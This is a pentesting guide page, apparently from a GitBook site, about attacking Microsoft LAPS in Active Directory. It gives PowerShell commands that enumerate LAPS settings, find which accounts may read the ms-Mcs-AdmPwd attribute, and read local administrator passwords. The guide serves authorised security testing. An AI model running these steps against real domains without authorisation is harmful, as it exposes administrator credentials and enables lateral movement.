The Pentesting Guide
TwitterBlog
  • The Pentesting Guide
  • ℹ️0 - Pre-Engagement
  • 🔍1 - Information Gathering
  • Passive (OSINT)
  • Active
    • 🕵️HUMINT
    • WIFI
    • IP & Port Scanning
    • Services
      • 21 - FTP
      • 22 - SSH
      • 25 - SMTP
      • 53 - DNS
      • 80,443 - WEB
      • 88 - Kerberos
      • 110 - POP3
      • 111 - rpcbind
      • 161 - SNMP
      • 389 - LDAP
      • 139,445 - SMB
      • Active Directory
  • 💣2 - Exploitation
  • Brute Forcing
  • WEB
    • Apache Tomcat
    • Authentication
    • Broken Access Control
    • Cache poisoning
    • Clickjacking
    • CORS
    • CSRF
    • File Inclusion
    • Host Header Injection
    • HTTP Request Smuggling
    • Information disclosure
    • JWT
    • OS command injection
    • PHP deserialisation
    • SQLi
    • SSRF
    • SSTI
    • Shellshock
    • Unrestricted File Upload
    • XSS
    • XXE
  • Web (OWASP Test cases)
    • 4.1 Information Gathering
    • 4.2 Configuration and Deployment Management Testing
    • 4.3 Identity Management Testing
    • 4.4 Authentication Testing
    • 4.5 Authorization Testing
    • 4.6 Session Management Testing
    • 4.7 Input Validation Testing
    • 4.8 Testing for Error Handling
    • 4.9 Testing for Weak Cryptography
    • 4.10 Business Logic Testing
    • 4.11 Client-side Testing
    • 4.12 API Testing
  • WIFI
  • HUMINT
    • 🎣Gophish (Phishing)
    • Malicious Phishing Files
    • Phishing Evaluation
  • BoF - Windows(x86)
  • Active Directory
    • Kerberos
    • GPOs
    • Certificates
    • LAPS
    • Domain Trusts
  • 👿3 - Post Exploitation
  • File transfer
  • Shells
  • Situational Awareness
    • Containers and VMs
    • Linux
    • Windows
      • Dumping Credentials
      • Countermeasure Evasion
    • Active Directory
      • BloodHound & SharpHound
  • General
    • Linux
    • Windows
  • Local Privilege Escalation
    • Linux
    • Windows
  • Persistance
    • Windows
  • Cracking
  • Pivoting
    • Tunnelling & Port Forwarding
  • Lateral Movement
  • WIFI
  • 📓4 - Report
  • 🧹5 - House cleaning
Powered by GitBook
On this page
  • Introduction
  • Enumeration
  • Exploitation
  1. Active Directory

LAPS

Last updated 1 year ago

Introduction

Local Administrator Password Solution (LAPS) is a Microsoft tool that helps organizations secure their local administrator accounts on Windows-based computers. It provides a unique, randomly generated password for each local administrator account on every managed computer in an organization's network, and stores the password securely in Active Directory.

Enumeration

There are three main ways to check if LAPS is enabled on the machine you have access to.

  • Check if the AdmPwd.dll exists on the system.

dir C:\Program Files\LAPS\CSE
  • Check for GPOs related to "LAPS".

Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath | fl
  • Check if the object ms-Mcs-AdmPwdExpirationTime is not null.

Get-DomainComputer | ? { $_."ms-Mcs-AdmPwdExpirationTime" -ne $null } | select dnsHostName

Exploitation

1. Download the Registry.pol, which location is at the gpcfilesyspath obtained while enumerating GPOs.

ls <GPCFileSysPath>\Machine\Registry.pol

2. Parse the file with the following command from the .

Parse-PolFile .\Desktop\Registry.pol

After parsing the file, you can obtain the following information:

  • Password complexity is upper, lower and numbers.

  • Password length is 14.

  • Passwords are changed every 30 days.

  • The LAPS managed account name is LapsAdmin.

  • Password expiration protection is disabled.

3. Then, it is time to find out who can read the LAPS password. (There are two alternatives).

  • Directly looking at the computer ADLS

# Obtain the SID
Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "ms-Mcs-AdmPwd" -and $_.ActiveDirectoryRights -match "ReadProperty" } | select ObjectDn, SecurityIdentifier
# Convert the SID
ConvertFrom-SID <SecurityIdentifier>
. .\LAPSToolkit.ps1
Find-LAPSDelegatedGroups

4. Once you have the permissions to read the password, you can read it as follows.

Get-DomainComputer -Identity <HOSTNAME> -Properties ms-Mcs-AdmPwd

Using the .

Find-LAPSDelegatedGroups will query each OU and find domain groups that have delegated read access. Find-AdmPwdExtendedRights goes a little deeper and queries each individual computer for users that have "All Extended Rights". This will reveal any users that can read the attribute without having had it specifically delegated to them.

ℹ️
GPRegistryPolicyParser
LAPSToolkit